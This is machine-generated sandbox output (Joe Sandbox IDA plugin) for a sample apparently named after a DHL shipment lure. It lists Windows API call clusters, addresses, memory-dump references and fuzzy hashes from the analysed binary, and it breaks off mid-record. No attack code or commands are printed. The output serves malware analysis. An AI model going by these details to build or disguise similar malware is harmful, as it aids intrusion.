                                                                                      • _wcslen.LIBCMT ref: 00E357AF
                                                                                      • _wcslen.LIBCMT ref: 00E357BA
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E35816
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 763830540-0
                                                                                      • Opcode ID: 6c9828673a10c2e6b2b4b8c59e67581b07c446a765188d269f55a0782d25ee4c
                                                                                      • Instruction ID: 6365d7d64cfaf5be040aa3cc4344d1d6c1360cdc329955f040dc88944a720d17
                                                                                      • Opcode Fuzzy Hash: 6c9828673a10c2e6b2b4b8c59e67581b07c446a765188d269f55a0782d25ee4c
                                                                                      • Instruction Fuzzy Hash: C2218572904618DADB209FA5CC89AED7FB8FF44724F109256F929FB280D7708985CF51
                                                                                      APIs
                                                                                      • IsWindow.USER32(00000000), ref: 00E20951
                                                                                      • GetForegroundWindow.USER32 ref: 00E20968
                                                                                      • GetDC.USER32(00000000), ref: 00E209A4
                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00E209B0
                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00E209E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                      • String ID:
                                                                                      • API String ID: 4156661090-0
                                                                                      • Opcode ID: ffe185a727300d73c5ba4964be758adfed04db20424475dafd68dc15b7ef9ee4
                                                                                      • Instruction ID: beec60ec66a1aa003260b82011478b367297b2b50e74aa036006c4d69864d4d6
                                                                                      • Opcode Fuzzy Hash: ffe185a727300d73c5ba4964be758adfed04db20424475dafd68dc15b7ef9ee4
                                                                                      • Instruction Fuzzy Hash: B2218435600214AFD704EF65D849A9EBBF5EF85710F148469F846B7762CB30EC44CB60
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00DDCDC6
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DDCDE9
                                                                                        • Part of subcall function 00DD3820: RtlAllocateHeap.NTDLL(00000000,?,00E71444,?,00DBFDF5,?,?,00DAA976,00000010,00E71440,00DA13FC,?,00DA13C6,?,00DA1129), ref: 00DD3852
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DDCE0F
                                                                                      • _free.LIBCMT ref: 00DDCE22
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DDCE31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: e112fb166557a67208ac902c66646e3fe4e13140be0be6964f4832d15a294dc0
                                                                                      • Instruction ID: dab87e36337d013438662e60d33d3e2c1b1307f99c5f6485d10d5639f60b180e
                                                                                      • Opcode Fuzzy Hash: e112fb166557a67208ac902c66646e3fe4e13140be0be6964f4832d15a294dc0
                                                                                      • Instruction Fuzzy Hash: 990188B26122167F272116BB6C4CD7BBE6DDFC6BA1729112BF905E7301DA61CD01D2B0
                                                                                      APIs
                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB9693
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00DB96A2
                                                                                      • BeginPath.GDI32(?), ref: 00DB96B9
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00DB96E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 8c40c6a798c43237a4b3711152d46b1fb90463d0ab2c1cae20f0c533ce7bdd2f
                                                                                      • Instruction ID: 6c7d55dc13a1473819a5df0fced278252fed33d2f7634389f6da05c4d23bee2d
                                                                                      • Opcode Fuzzy Hash: 8c40c6a798c43237a4b3711152d46b1fb90463d0ab2c1cae20f0c533ce7bdd2f
                                                                                      • Instruction Fuzzy Hash: 0521B330802349EFDB10DF2ADC287E9BBB4BB90355F144256F615B60B0D370988ACFA0
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000008), ref: 00DB98CC
                                                                                      • SetTextColor.GDI32(?,?), ref: 00DB98D6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00DB98E9
                                                                                      • GetStockObject.GDI32(00000005), ref: 00DB98F1
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00DB9952
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongModeObjectStockTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1860813098-0
                                                                                      • Opcode ID: 2e0c7a6b6969886a85e362d0ca5bc2acaa7d1e540300a7f144dc4d75702e55e4
                                                                                      • Instruction ID: 3589d21d6caaf3b8633ed58cd7603bfd0296ff3491012b45b5e6073b8c8e754f
                                                                                      • Opcode Fuzzy Hash: 2e0c7a6b6969886a85e362d0ca5bc2acaa7d1e540300a7f144dc4d75702e55e4
                                                                                      • Instruction Fuzzy Hash: BF21F33254A2D4DFCB228B369C69AE67F609B13320B2C015EE797AB1A1C7258941CB61
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: d2e3c2c7a55a6d0f2fa4a7a5e3f2556f07af60a434bf31d7d3a16b14c4074175
                                                                                      • Instruction ID: 233d655fdf84f2bd24cd2a053acafdeb58ee9fa6c4b5a6c6d8eff98e170118fb
                                                                                      • Opcode Fuzzy Hash: d2e3c2c7a55a6d0f2fa4a7a5e3f2556f07af60a434bf31d7d3a16b14c4074175
                                                                                      • Instruction Fuzzy Hash: 2F01D6A7681616BAD70851109E42FFB634CDB21398F081026FD04BB282F620ED61D6B1
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00DCF2DE,00DD3863,00E71444,?,00DBFDF5,?,?,00DAA976,00000010,00E71440,00DA13FC,?,00DA13C6), ref: 00DD2DFD
                                                                                      • _free.LIBCMT ref: 00DD2E32
                                                                                      • _free.LIBCMT ref: 00DD2E59
                                                                                      • SetLastError.KERNEL32(00000000,00DA1129), ref: 00DD2E66
                                                                                      • SetLastError.KERNEL32(00000000,00DA1129), ref: 00DD2E6F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 578303e10500a01daf7769dca22d82768c8ed6fb4aa026297eae97007d42c3d8
                                                                                      • Instruction ID: f1285439526997bc27fd241522649773ee107808bb1cb8bade9bd63b567f89ad
                                                                                      • Opcode Fuzzy Hash: 578303e10500a01daf7769dca22d82768c8ed6fb4aa026297eae97007d42c3d8
                                                                                      • Instruction Fuzzy Hash: 6901F4326456006FC61227766C4AD3B2B6DEBF13B2B39442BF465B3392EBB1CC054130
                                                                                      APIs
                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?,?,?,00E0035E), ref: 00E0002B
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?,?), ref: 00E00046
                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?,?), ref: 00E00054
                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?), ref: 00E00064
                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?,?), ref: 00E00070
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3897988419-0
                                                                                      • Opcode ID: 35a8ef3cd2b2181b07b4dc78205cd6eba5c14f2ab910a3d21c8c8bc8ab4358c5
                                                                                      • Instruction ID: 15c093716e03cf9d970c207622aaec0e59a3fca8f719ce5fb117184c0dd399c0
                                                                                      • Opcode Fuzzy Hash: 35a8ef3cd2b2181b07b4dc78205cd6eba5c14f2ab910a3d21c8c8bc8ab4358c5
                                                                                      • Instruction Fuzzy Hash: FB01A276600208BFDB154F69DC08BAA7EEDEF44751F245524F905F2250DB71DE849BA0
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E0E997
                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00E0E9A5
                                                                                      • Sleep.KERNEL32(00000000), ref: 00E0E9AD
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E0E9B7
                                                                                      • Sleep.KERNEL32 ref: 00E0E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                      • String ID:
                                                                                      • API String ID: 2833360925-0
                                                                                      • Opcode ID: 3d76287ee03650e12c38da227904b08ac2c21ba1db88aedf792c7b1c33eff349
                                                                                      • Instruction ID: 6c9074798e201fe94ee86039aa5b97170fb3ba47a289cdcd57306b5194084044
                                                                                      • Opcode Fuzzy Hash: 3d76287ee03650e12c38da227904b08ac2c21ba1db88aedf792c7b1c33eff349
                                                                                      • Instruction Fuzzy Hash: 1C015B31C0162DDBCF04ABE6DC496EDBB78FB48301F5009A6E502B2290CB30959487A1
                                                                                      APIs
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01114
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E01120
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E0112F
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E01136
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E0114D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 842720411-0
                                                                                      • Opcode ID: 4fd0318da39c133492c96d41cbb07da63c5e780e228c257b85ce9abf6ffddf2c
                                                                                      • Instruction ID: 9f419198837c209743f78ae2de1d27ed300768c94156b8b58f7bbe38e52839b1
                                                                                      • Opcode Fuzzy Hash: 4fd0318da39c133492c96d41cbb07da63c5e780e228c257b85ce9abf6ffddf2c
                                                                                      • Instruction Fuzzy Hash: A5016975201209BFDB154FA6DC4DA6A3F6EEF893A4B200459FA41E73A0DA31DC409B60
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E00FCA
                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E00FD6
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E00FE5
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E00FEC
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E01002
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: 93a0f995cdcbafe41969f7482c2981f6585981643e9df7fc2578689dd5b4780b
                                                                                      • Instruction ID: 20d54550be715d60cdadae5c254b8cd0785d1ac989e790eab9bd8ee46aa7c048
                                                                                      • Opcode Fuzzy Hash: 93a0f995cdcbafe41969f7482c2981f6585981643e9df7fc2578689dd5b4780b
                                                                                      • Instruction Fuzzy Hash: AFF0AF35200305AFD7210FA59C4DF563F6EEF89761F210454F945FB290CA31DC809B60
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E0102A
                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E01036
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01045
                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E0104C
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01062
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: 7ff2225ca8e4d3b045a9a490a4bcc798088c23c927805c978ae38e37287709ee
                                                                                      • Instruction ID: 22e8b83a90b8245d486cfdf1ee0ea1d834c0fd78a7b0795a6b36bb1f1aadca66
                                                                                      • Opcode Fuzzy Hash: 7ff2225ca8e4d3b045a9a490a4bcc798088c23c927805c978ae38e37287709ee
                                                                                      • Instruction Fuzzy Hash: A8F0AF35200305AFD7211FA5EC4CF563F6DEF89761F210414F985FB290CA31D8809B60
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00E1017D,?,00E132FC,?,00000001,00DE2592,?), ref: 00E10324
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00E1017D,?,00E132FC,?,00000001,00DE2592,?), ref: 00E10331
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00E1017D,?,00E132FC,?,00000001,00DE2592,?), ref: 00E1033E
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00E1017D,?,00E132FC,?,00000001,00DE2592,?), ref: 00E1034B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00E1017D,?,00E132FC,?,00000001,00DE2592,?), ref: 00E10358
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00E1017D,?,00E132FC,?,00000001,00DE2592,?), ref: 00E10365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 28c029c5af3e5a3f775d94fb1f8686fdfb3fc3d8a489d3c9ab718976e531bef0
                                                                                      • Instruction ID: 7ba9d215114aeb2b6a7a564ddb389b85801b106fbee77a0b0a44c93f069d2898
                                                                                      • Opcode Fuzzy Hash: 28c029c5af3e5a3f775d94fb1f8686fdfb3fc3d8a489d3c9ab718976e531bef0
                                                                                      • Instruction Fuzzy Hash: 8801A272800B159FC730AF66D880452FBF5BF503193159A3FD1A662931C3B1A999DF80
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00DDD752
                                                                                        • Part of subcall function 00DD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000), ref: 00DD29DE
                                                                                        • Part of subcall function 00DD29C8: GetLastError.KERNEL32(00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000,00000000), ref: 00DD29F0
                                                                                      • _free.LIBCMT ref: 00DDD764
                                                                                      • _free.LIBCMT ref: 00DDD776
                                                                                      • _free.LIBCMT ref: 00DDD788
                                                                                      • _free.LIBCMT ref: 00DDD79A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: d2de1563eb6176f297e98eb6cf3cec564b5e5be59182a162bbb8beabd79f011a
                                                                                      • Instruction ID: c705328e1346b6f3e08c02955011d0f80ba3d2b21358a7bd5663ce92528cb784
                                                                                      • Opcode Fuzzy Hash: d2de1563eb6176f297e98eb6cf3cec564b5e5be59182a162bbb8beabd79f011a
                                                                                      • Instruction Fuzzy Hash: 6FF0FF32584204BB8A25EB65FDC5C2777DEFB54750BA81847F099E7601C774FC808A74
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E05C58
                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E05C6F
                                                                                      • MessageBeep.USER32(00000000), ref: 00E05C87
                                                                                      • KillTimer.USER32(?,0000040A), ref: 00E05CA3
                                                                                      • EndDialog.USER32(?,00000001), ref: 00E05CBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3741023627-0
                                                                                      • Opcode ID: e6922128a5e58fcff0392489a52fa0c40c74477e9c86b5584bb9deb7ca664d60
